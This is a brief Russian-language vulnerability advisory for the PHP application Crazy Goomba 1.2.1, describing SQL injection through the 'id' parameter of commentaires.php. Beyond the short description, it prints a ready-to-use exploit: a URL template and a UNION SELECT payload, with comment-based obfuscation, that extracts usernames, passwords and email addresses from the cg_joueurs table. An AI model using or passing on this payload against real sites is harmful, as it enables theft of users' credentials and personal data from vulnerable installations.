Программа: Crazy Goomba 1.2.1

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «id» сценарием commentaires.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Эксплоит:

http://localhost/Crazy_Goomba_1.2.1_path/commentaires.php?id=[SQL]

1’/**/union/**/select/**/0,pseudo,password,email,id,0,0/**/from/**/cg_joueurs/**



Оставить мнение